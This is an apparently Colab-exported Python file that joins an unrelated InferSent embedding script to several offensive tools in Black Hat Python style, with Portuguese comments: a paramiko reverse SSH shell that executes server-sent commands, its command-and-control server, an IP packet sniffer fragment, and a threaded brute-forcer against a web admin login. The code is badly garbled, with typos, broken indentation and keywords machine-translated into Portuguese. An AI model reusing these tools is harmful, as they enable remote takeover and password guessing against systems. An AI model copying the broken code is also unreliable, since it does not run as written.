# -*- coding: utf-8 -*-
"""SSH com Paramiko.ipynb

Automatically generated by Colaboratory.

Original file is located at
    https://colab.research.google.com/drive/18f3Om65f5nTsnW0AHPm-S-PkWWE3rqNH
"""

import ps 
import torch
import argparse

import numpy as np
from models import Infersent

if _name_ == '_main_':
    
    parser = argparse.ArgumentParser(
            prog = 'Extract-features'
            description = 'Extract Features from pretrained Infersent Model')
    
    
    parser.add_argument('-g', '--w2v_path', type = str, required = True,
                        help = 'Path to word vector file')
    parser.add_argument('-v', '--version', type=int, required=True,
                        help='Version of InferSent (GloVe-V1 or fastText-V2)')
    parser.add_argument('-f', '--model_path', type=str, required=True,
                        help='Path to pretrained .pkl model file')
    parser.add_argument('-t', '--tokenize', action='store_true',
                        help='Passes tokenize=True to build_vocab()')
    parser.add_argument('-o', '--out-dir', type=str, required=True,
                        help='Output folder to save feature files')
    parser.add_argument('-c', '--cpu', action='store_true',
                        help='Use CPU instead of GPU.')
    parser.add_argument('-b', '--batch-size', type=int, default=64,
                        help='Batch size (default: 64)')
    parser.add_argument('files', nargs='+',
                        help='List of files to extract sentence embeddings')

    args = parser.parse_args()
 
    params_model = {'bsize': 64, 'word_emb_dim': 300, 'enc_lstm_dim': 2048,
                    'poo_type': 'max', 'dpout_model': 0.0, 'version': args.version}
    model = infersent(params_model)
    model.load_state_dict(torch.load(args.model_path))
    
    if not args.cpu:
        model = model.cuda()
        
    model.set_w2v_path(args.w2v_path)
    
    #ensure directory
    if not os.path.exists(args.out_dir):
        os.makedirs(args.out_dir)
    
    #lendo arquivos e extratos futuros
    for fpath in arg.files:
        print('Lendo arquivos {}'.format(fpath))
        sents = []
        with open(fpath) as f:
            for line in f:
                line = line.strip()
                assert line, "Fim da linha em {}".format(fpath)
                sent.append(line)
                
        #set output file name
        out_name = os.path.join(
                args.out_dir, "{}.npy".format(os.path.basename(fpath)))
        
        #build vocab 
        print('Corpo do vocabulario')
        model.build_vocab(sents, args.tokenize)
        
        #get embedding
        embs = model.encode(sents, tokenize = args.tokenize,
                            verbosidade = True, bsize = args.batch_size)
       
        print('Salvando o {}'.format(out_name))
        np.save(out_name, embs)

#ssh com patamiko
import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHCliente()
    #client.load_host_keys('/home/justin/.ssh/know_hosts')
    client.set_missing-host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_trasnport().open_session()
    if session.active:
      ssh_session.exec_command(command)
      print ssh_session.recv(1024)
return
ssh_command('192.168.100.131', 'justin', 'lovesthepython', 'id')

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHClient()
    #client.load_host_keys('/home/justin/.ssh/know_hosts')
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
    ssh_session.send(command)
    print ssh_session.recv(1024) #le o banner
    while True:
        command = ssh_session.recv(1024) #obtem o comando do servidor ssh
        try:
            cmd_output = subprocess.check_output(command, shell=true)
            ssh_session.send(cma_output)
        except Exception, e:
            ssh_session.send(str(e))
client.close()
return
ssh_comand('192.168.100.130', 'justin', 'lovespython', 'ClientConnected')

import threading
import paramiko
import subprocess
import sys
#usando a chave dos arquivos de demonstração do paramiko
host_key = paramiko.RSAKey(filename='test_rsa.key')
class Server (paramiko.ServerInterface):
    def_init_(self):
        self.event = threading.Event()
        def check_channel_request(self, kind, chanid):
            if kind == 'session':
                return paramiko.OPEN_SUCCEEDED
            return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def chech_auth_password(self, username, password):
        if (username == 'justin') and (password == 'lovespython'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = int(sys.agv[2])
try:
    sock = socke.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET,SOCKET.SO_REUSEADOR,1)
    sock.bind((server, sssh_port))
    sock.listen(100)
    print '[+] Listenning for conncetion...'
    client, addr = sock.accept()
    except, Exception, e:
        print '[-] Listen failed: ' + strg(e)
        sys.exit(1)
        print '[+] Got a connection!'
        
        try:
            bhSession = paramiko.Transport(client)
            bhSession.addserver_keys(host_key)
            server = Server()
            try:
                bhSession.start_server(server=server)
            except paramiko.SSHException, x:
                print '[-] SSH negotiation failed.'
                chan = bhSession.accept(20)
                print '[+] Authenticated!'
                print chan.recv(1024)
                chand.send(' Welcome to bh_ssh')
                while True:
                    try:
                        command= raw_input("Enter command: ").strip('\n')
                        if command != 'exit':
                            chan.send(command)
                            print chan.recv(1024) + '\n'
                        else:
                            chand.send('exit')
                            print 'exiting'
                            bhSession.close()
                            raise Exception ('exit')
                        except KeyboardInterrupt:
                            bhSession.close()
except Exception, e:
    print '[-] Cught exception: ' + str(e)
    try:bhSession.close()
    except:
        pass
    sys.exit(1)

import socket

import os 
import struct
from ctypes import *
#host que ouvira
host = "192.168.0.187"

#nosso cabecalho ip
class IP(Structure):
    _fields_ = [
        ("ihl",    c_ubyte, 4)
        ("version",c_ubyte, 4)
        ("tos",    c_ubyte)
        ("len",    c_ushort)
        ("id",     c_ushort)
        ("offset", c_ushort)
        ("ttl",    c_ubyte)
        ("protocol_num", c_ubyte)
        ("sum",    c_ushort)
        ("src",    c_ulong)
        ("dst",    c_ulong)
        ]
    def _new_(self, socket_buffer=None):
        return self.from_buffer_copy(socket_buffer)
    def_init_(self, socket_buffer=None):
        
#mapeia constantes do protocolo aos seus nomes
        self.protocol_map = {1:"ICMP", 6:"TCP",17:"UDP"}
        
        # endereços IP legiveis aos seres humanos 
        self.src_adress = socket.inet_ntoa(struct.pack("<L" ,self.src))
        self.dst_adress = socket.inet_ntoa(struct.pack("<L" ,self.dst))
        
        #protocolo legivel aos seres humanos 
        try: 
            self.protocol = self.protocol_map[self.protocol_num]
        except:
            sel.protocol = str(self.protocol_num)
    #este codigo e igual o anterior

import  urllib2 
import  urllib
 cookielib de importação
 rosqueamento de importação
 sys de importação
 fila de importação

de  HTMLParser  import  HTMLParser

# Configurações Gerais
user_thread    =  10
nome de usuário       =  "admin"
wordlist_file  =  "/tmp/cain.txt"
resume         =  None

# segmentar configurações específicas
target_url     =  "http://192.168.112.131/administrator/index.php"
target_post    =  "http://192.168.112.131/administrator/index.php"

nomedeusuário_campo =  "nomedeusuário"
password_field =  "passwd"

success_check  =  "Administração - Painel de Controle"

class BruteParser(HTMLParser):
    
    def _init_(self):
        HTMLParser. initi(proprio)
        user.tag_results = {}
        
    def handle_starttag(self, tag, attrs):
        if tag == "input" :
            tag_name = None
            tag_value = None
            for name, value in attrs:
                if name == "nome":
                    tag_name = value
                if name == "valor":
                    tag_value = value
            
            if tag_name not for None:
                user.tag_results[tag_name] = valor
                

class bruter(obejct):
    def _init_(name, username, password):
        user_username = nome de usuario
        user_password_q = palavras
        user_encontrado = False
        
        print"Configuração concluida para; %s" % username
        
    def run_bruteforce (self):
        for i in range(user_thread):
            t = socket.Topico(target = sel.web_bruter)
            t.start()
            
    def web_bruter(self):
        
        while not user_password_q vazio () and not proprio find:
            bruto = user_password_q.get(), rstrip()
            jar = cookielib.fileCooklieJar("cookies")
            open = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            
            
            response = opener.open(target_url)
            page = resposta.read()
            print"Tentar:% s:% s (% d esquerda)"  % ( auto . nome de usuário , bruta , auto . password_q . qsize ())
            
            #analisar os campos ocultos 
            parser = BruteParser ()
            analyzer.feed(pagina)
            post_tags = analyzer.tag_results
            
            #adicione nossos campos de usuario e senha 
            
            post_tags [nome_do_usuario_campo] = proprio.nome do usuario
            post_tags [password_field] = bruto
            
            login_data = urllib.urlencode(post_tags)
            login_response = opened.open (target_post, login_data)
            
            login_result = login_response.read()
            
            if sucess_check in login_result:
                user.found = True
                
                print  "[*] Bruteforce com sucesso."
                print  "[*] Nome de usuário:% s"  %  nome de usuário
                print  "[*] Senha:% s"  %  brute
                print  "[*] Aguardando a saída de outros threads ..."
                
    def build_wordlist(arquivo de lista de palavras):
         #ler na lista de palavras
         fd = aberto(wordlist_file, "rb")
         raw_words = fd.readlines()
         fd.exit()
         
         found_resume = False
         words        = Queue.file()
         
         for palavras in raw_words:
             palavra = palavra.rstrip()
             
        if resumo not for Nenhum:
            
            if found_resume:
                palavras.index(palavra)
        elif:
            if word == resume:
                found_resume = True
                
                    print  "Reiniciando a lista de palavras de:% s"  %  resume
        elif: 
            palavras.index(palavra)
            
            return palavras
words = build_wordlist(arquivo de list de palavras)

bruter_obj = Bruter(username, password)
bruter_obj. runbruterforce()